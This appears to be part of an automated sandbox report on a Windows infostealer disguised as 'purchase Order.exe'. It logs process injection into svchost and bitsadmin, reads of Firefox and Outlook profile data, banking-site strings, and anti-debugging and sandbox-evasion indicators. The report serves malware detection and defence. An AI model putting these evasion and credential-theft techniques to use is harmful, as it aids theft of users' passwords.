Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C86532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00C86532

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C9C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_00C9C18C

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C4406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00C4406B

Source: C:\Users\user\Desktop\purchase Order.exe

File created: C:\Users\user\AppData\Local\Temp\aut2EA4.tmp

Jump to behavior

Source: purchase Order.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\purchase Order.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3220792547.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1807697503.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3220792547.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1807843685.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: purchase Order.exe	ReversingLabs: Detection: 57%
Source: purchase Order.exe	Virustotal: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\purchase Order.exe "C:\Users\user\Desktop\purchase Order.exe"
Source: C:\Users\user\Desktop\purchase Order.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\purchase Order.exe"
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\purchase Order.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\purchase Order.exe"	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\purchase Order.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase Order.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase Order.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase Order.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase Order.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase Order.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase Order.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase Order.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase Order.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase Order.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase Order.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase Order.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\purchase Order.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\bitsadmin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\bitsadmin.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: purchase Order.exe

Static file information: File size 1209344 > 1048576

Source: purchase Order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: purchase Order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: purchase Order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: purchase Order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: purchase Order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: purchase Order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: purchase Order.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: bitsadmin.pdb source: svchost.exe, 00000002.00000003.1587669784.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587772591.0000000003048000.00000004.00000020.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3220941177.0000000000558000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000002.00000003.1587669784.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587772591.0000000003048000.00000004.00000020.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3220941177.0000000000558000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: McqlvggSSSjC.exe, 00000004.00000002.3221614821.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp, McqlvggSSSjC.exe, 00000006.00000000.1689659605.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: purchase Order.exe, 00000000.00000003.1396204625.0000000004110000.00000004.00001000.00020000.00000000.sdmp, purchase Order.exe, 00000000.00000003.1392103666.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1621586541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1621586541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523966149.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1525871105.0000000003500000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.000000000349E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1624599311.000000000314D000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1621215239.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.0000000003300000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: purchase Order.exe, 00000000.00000003.1396204625.0000000004110000.00000004.00001000.00020000.00000000.sdmp, purchase Order.exe, 00000000.00000003.1392103666.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1621586541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1621586541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523966149.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1525871105.0000000003500000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.000000000349E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1624599311.000000000314D000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1621215239.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.0000000003300000.00000040.00001000.00020000.00000000.sdmp

Source: purchase Order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: purchase Order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: purchase Order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: purchase Order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: purchase Order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C5E01E LoadLibraryA,GetProcAddress,

0_2_00C5E01E

Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C66B05 push ecx; ret	0_2_00C66B18
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C4EEA5 push esi; retf	0_2_00C4EEA6
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C4EEAD push esi; retf	0_2_00C4EEAE
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C4EEAF push esi; retf	0_2_00C4EEB2
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C4EEB3 push esi; retf	0_2_00C4EEB6
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C4EEBD push edi; retf	0_2_00C4EEBE
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C4EEBF push esi; retf	0_2_00C4EEC2
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C4EEB9 push edi; retf	0_2_00C4EEBA
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C4EE0D push ebp; retf	0_2_00C4EE0E
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C4EE12 push esi; retf	0_2_00C4EE16
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C515CD pushfd ; retf	0_2_00C515D6
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C515DB pushfd ; retf	0_2_00C51616
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C4FD8C push FFFFFF8Ch; retf	0_2_00C4FDE6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402055 push edx; iretd	2_2_00402056
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004018A1 push edx; iretd	2_2_004018A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414930 push eax; retf	2_2_00414937
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004181E4 push ds; retf	2_2_004181E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040218B push ebp; iretd	2_2_00402192
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D9B6 push FFFFFFEBh; iretd	2_2_0040D9BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041AA30 push edx; retf	2_2_0041AA31
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004192F1 push edx; ret	2_2_004192F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00425433 push edi; ret	2_2_00425483
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403570 push eax; ret	2_2_00403572
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414658 push esp; ret	2_2_00414659
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414E8B pushfd ; iretd	2_2_00414E91
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040A7C3 push edi; ret	2_2_0040A7F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D7CA push ecx; ret	2_2_0040D7CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx	2_2_037309B6

Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00CA8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00CA8111
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C5EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00C5EB42

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C6123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00C6123A

Source: C:\Users\user\Desktop\purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\purchase Order.exe	API/Special instruction interceptor: Address: 17CE07C
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FF90818D324
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FF90818D7E4
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FF90818D944
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FF90818D504
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FF90818D544
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FF90818D1E4
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FF908190154
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FF90818DA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: purchase Order.exe, 00000000.00000002.1397036042.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, purchase Order.exe, 00000000.00000003.1375746834.0000000001653000.00000004.00000020.00020000.00000000.sdmp, purchase Order.exe, 00000000.00000003.1375841506.00000000016B8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: PROCESSHACKER.EXE

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0377096E rdtsc

2_2_0377096E

Source: C:\Users\user\Desktop\purchase Order.exe

Evaded block: after key decision

graph_0-95947

Source: C:\Users\user\Desktop\purchase Order.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-96486

Source: C:\Users\user\Desktop\purchase Order.exe	API coverage: 4.9 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %

Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6556	Thread sleep count: 44 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6556	Thread sleep time: -88000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe TID: 336	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe TID: 336	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\bitsadmin.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\bitsadmin.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C86CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C86CA9
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_00C860DD
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_00C863F9
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C8EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C8EB60
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C8F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C8F5FA
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C8F56F FindFirstFileW,FindClose,	0_2_00C8F56F
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C91B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C91B2F
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C91C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C91C8A
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C91F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C91F94

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C5DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00C5DDC0

Source: z5f52P3-.5.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: bitsadmin.exe, 00000005.00000002.3224590878.0000000007C66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,116964T
Source: z5f52P3-.5.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: bitsadmin.exe, 00000005.00000002.3224590878.0000000007C66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,1169649
Source: z5f52P3-.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: z5f52P3-.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: bitsadmin.exe, 00000005.00000002.3224590878.0000000007C66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155e
Source: z5f52P3-.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: z5f52P3-.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: z5f52P3-.5.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: z5f52P3-.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: bitsadmin.exe, 00000005.00000002.3224590878.0000000007C66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11
Source: bitsadmin.exe, 00000005.00000002.3224590878.0000000007C66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,1169649715
Source: z5f52P3-.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000006.00000002.3221401387.000000000136F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.1920228565.0000020AF2B9C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: z5f52P3-.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: z5f52P3-.5.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: z5f52P3-.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: z5f52P3-.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: z5f52P3-.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: z5f52P3-.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: z5f52P3-.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: z5f52P3-.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: z5f52P3-.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: z5f52P3-.5.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: z5f52P3-.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: z5f52P3-.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: z5f52P3-.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: z5f52P3-.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: z5f52P3-.5.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: z5f52P3-.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: z5f52P3-.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: z5f52P3-.5.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: z5f52P3-.5.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: z5f52P3-.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: z5f52P3-.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: bitsadmin.exe, 00000005.00000002.3224590878.0000000007C66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696
Source: z5f52P3-.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\purchase Order.exe	API call chain: ExitProcess graph end node			graph_0-95156
Source: C:\Users\user\Desktop\purchase Order.exe	API call chain: ExitProcess graph end node			graph_0-96236

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0377096E rdtsc

2_2_0377096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417B23 LdrLoadDll,

2_2_00417B23

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C96AAF BlockInput,

0_2_00C96AAF

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C43D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00C43D19

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C73920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00C73920

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C5E01E LoadLibraryA,GetProcAddress,

